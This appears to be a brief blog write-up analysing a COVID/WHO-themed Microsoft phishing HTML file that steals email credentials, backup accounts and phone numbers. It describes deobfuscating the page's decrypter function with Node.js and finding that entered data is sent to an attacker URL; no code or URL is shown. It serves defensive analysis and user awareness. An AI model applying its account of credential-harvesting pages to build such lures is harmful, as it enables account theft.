The sample being analysed is Microsoft Doc phishing HTML file with Corona Virus and WHO name. The file is trying to steal the user’s email credentials, backup account and phone number by lure them to enter their details in a crafted fake HTML site.
Please be careful when dealing with these kind of phishing webpage (e.g. DHL, Dropbox, Paypal, Microsoft etc.) from unknown source.
Install nodejs & npm
Looking at the beautified code, there is one function that is repeatly called in the code. The function is looks like a decrypter and the decrypted strings/code will replace the specific CSS tag that has been declared in HTML file.
Its time to run the node command, but please comment out the line which contains the HTML document related function (e.g. document.write(), ActiveXObject) as it will cause error during runtime.
Here is the screenshot of decrypted strings in
After glance through the code, seems like the page is interacting with a unknown URL shown in the screenshot below.
Any data that enter by the user will send to the unknown URL (mostly attacker), then your credential will be exposed to them. :’(
The attacker can gain the access to your account and take over from it.
However, the attacker will have restricted access towards MFA enabled account.
Coronavirus World Health Organization (WHO).html
How To Install Node.js on Ubuntu 18.04 | DigitalOcean